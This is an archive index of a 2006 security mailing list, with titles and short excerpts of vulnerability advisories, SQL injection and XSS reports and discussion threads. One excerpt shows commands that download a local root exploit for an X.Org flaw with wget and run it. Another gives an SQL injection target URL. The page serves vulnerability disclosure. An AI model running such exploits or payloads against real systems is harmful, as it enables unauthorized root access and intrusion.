[SECURITY] [DSA 1013-1] New snmptrapfmt packages fix insecure temporary file
2006-03-22 joey infodrom org (Martin Schulze)

cutenews 1.4.1 Arbitrary File Access
2006-03-22 h e (het_ebadi yahoo com)
cutenews 1.4.1 Arbitrary File Access Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection ... http://cutephp.com Credit: The inf

WinHKI 1.6x Archive Extraction Directory traversal
2006-03-22 h e (het_ebadi yahoo com)
WinHKI 1.6x Archive Extraction Directory traversal WinHKI Archiver administrator ask me for penetration test. here is the result : WinHKI Archiver: compression (hki, cab, zip, gzip, tar, jar...) extract 14 formats (hki, rar, ace, zip, gzip, tar, ...) Encryption / Decryption support Full zip sup

DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline attack'
2006-03-21 KF (lists) (kf_lists digitalmunition com)
DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline attack'
Author: Kevin Finisterre
Vendor: http://www.motorola.com
Product: 'Motorola PEBL U6, Motorola V600, other Motorola P2k based phones?'
References: http://www.digitalmunition.com/DMA[2006-0321a].txt http://www.motorola.

[eVuln] PHP SimpleNEWS, PHP SimpleNEWS MySQL - Authentication Bypass Vulnerability
2006-03-22 alex evuln com
New eVuln Advisory: PHP SimpleNEWS, PHP SimpleNEWS MySQL - Authentication Bypass Vulnerability
http://evuln.com/vulns/94/summary.html
--------------------Summary----------------
eVuln ID: EV0094
Vendor: Himpfen Consulting Company
Vendor's Web Site: http://www.himpfenconsulting.com/
Software: PHP Si

FreeBSD Security Advisory FreeBSD-SA-06:11.ipsec
2006-03-22 FreeBSD Security Advisories (security-advisories freebsd org)

FreeBSD Security Advisory FreeBSD-SA-06:12.opie
2006-03-22 FreeBSD Security Advisories (security-advisories freebsd org)

FreeBSD Security Advisory FreeBSD-SA-06:13.sendmail
2006-03-22 FreeBSD Security Advisories (security-advisories freebsd org)

Mini-Nuke<=1.8.2 SQL injection (6)
2006-03-21 dabdoub_mosikar forislam com
//mini-nuke board turk have many sql injection founded by Moroccan Security Team
//Creetz to: Moroccan Security Team [Dr.E-vil,Dr.Erase,H0550N,|ucifer,DaBDouB-MoSiKaR [OverclockiX],ki11er] ,Dranzelz,Esp!onLeRaVaGe,ameer,www.lezr.com and all muslim [morocco]
[1] http://[target]/members.asp?action=me

ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities
2006-03-21 nukedx nukedx com
--Security Report--
Advisory: ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 20/03/06 11:14 PM
---
Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com Web: http://www.nukedx.com }
---
Vendor: ASPPortal (http://www.A

Free Articles Directory Remote Command Exucetion
2006-03-21 botan linuxmail org
Web Site : http://www.99articles.com
Script Demo Site : http://www.articlesone.com
General :
1. Support rssfeed (XML) to distribute articles for others website and blogs. It will make grow website popularity
2. Newsletter to be growing visitors
3. Membership system for writer participants submi

[ GLSA 200603-20 ] Macromedia Flash Player: Arbitrary code execution
2006-03-21 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[ GLSA 200603-19 ] cURL/libcurl: Buffer overflow in the handling of TFTP URLs
2006-03-21 Matthias Geerdsen (vorlon gentoo org)

Recon 2006: Guest speakers announcement. Call for paper and early registration ending in less than 2 weeks.
2006-03-21 Hugo Fortier (hfortier recon cx)
Recon 2006 - 16th 17th 18th June 2006 - Plaza Hotel, Montreal - recon.cx
------------------------------------------------------------------------
We are pleased to announce the guest speakers of Recon 2006 : Anthony de Almeida Lopes: Multi-cavity NOP-infection Operating System- Independent x86 Vi

Cisco Aironet 1300 DoS condition
2006-03-21 Alex (netshark gaiajoy com)
Cisco Aironet 1300 DoS condition

Synopsis
========
Cisco Aironet 1300 running IOS 12.3(8)JA with default settings is vulnerable to a DoS condition.

Background
=============
Cisco Aironet 1300 is the state-of-art enterprise p2p wireless repeater from Cisco. Supports a wide range of features, includ

XSS in Firepass 4100 SSL VPN v.5.4.2 (and probably others)
2006-03-21 alfy coders ch
Vulnerability class : Cross-Site Scripting
Discovery date : 2nd of February 2006
Remote : Yes
Local : No
Credit : ILION Research Labs, Geneva Switzerland
Vulnerable : F5 Firepass 4100 SSL VPN v. 5.4.2
A XSS (Cross-Site-Scripting) vulnerability has been uncovered in my.support.php3 called through a

[SECURITY] [DSA 1011-1] New kernel-patch-vserver packages fix root exploit
2006-03-21 joey infodrom org (Martin Schulze)

[SECURITY] [DSA 1012-1] New unzip packages fix arbitrary code execution
2006-03-21 joey infodrom org (Martin Schulze)

[ GLSA 200603-18 ] Pngcrush: Buffer overflow
2006-03-21 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[ GLSA 200603-17 ] PeerCast: Buffer overflow
2006-03-21 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

CORE-2006-0124: Cross-Site Scripting in Verisign's haydn.exe CGI script
2006-03-20 CORE Security Technologies Advisories (advisories coresecurity com)

Re: Invision Power Board v2.1.4 - session hijacking
2006-03-20 Hans Wolters (hans wolters xs4all nl)
Matt,
On 17-mrt-2006, at 10:26, matt (at) invisionpower (dot) com wrote:
p.s. ^^^ that email address does not work, and earlier reply got bounced.
> My problem with this report is this:
>
> 1) You've not even read the IPB code. You've stated elsewhere that
> "using sessions in the URL may appear in JS p

[ MDKSA-2006:057 ] - Updated cairo packages to address Evolution DoS vulnerability
2006-03-20 security mandriva com

[ MDKSA-2006:056 ] - Updated xorg-x11 packages to address local root vuln
2006-03-20 security mandriva com

DNS Amplification Attacks
2006-03-17 Gadi Evron (ge linuxbox org)
In this paper we address in detail how the recent DNS DDoS attacks work. How they abuse name servers, EDNS, the recursive feature and UDP packet spoofing, as well as how the amplification effect works. Our study is based on packet captures (we provide with samples) and logs from attacks on differ

Re: Invision Power Board v2.1.4 - session hijacking
2006-03-16 Bill Nash (billn odyssey billn net)
On Thu, 16 Mar 2006, matt (at) invisionpower (dot) com wrote:
> This report is ridiculous and quite frankly shows that the author does not understand how IPB works.
>
> Yes, the author is correct in finding that if you: copy the user's IP address, copy the user's user-agent and copy the user's session ID th

RE: Generically Determining the Prescence of Virtual Machines
2006-03-20 Thomas Guyot-Sionnest (Thomas zango com)
I suggest you make sure you're using the accelerator mode, which should put qemu in "Virtualization" mode. If you're doing full CPU emulation then the result you get was correct: you weren't doing any virtualization inside qemu.
Thomas
> -----Original Message-----
> From: Jeff Epler [mailto:jeple

Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0
2006-03-20 H D Moore (sflist digitaloffense net)
Two second exploit, but if anyone is lazy:
$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.

Symantec Security Advisory, SYM06-005
2006-03-20 secure symantec com
Symantec Security Advisory SYM06-005
17 March 2006
Veritas Backup Exec for Windows Servers: Media Server BENGINE Service Job log Format String Overflow
Revision History None
Severity Low (network/system authorization and specific configuration required)
Remote Access Yes
Local Access No
Authe
Debian Security Advisory DSA 1013-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
March 22nd, 2006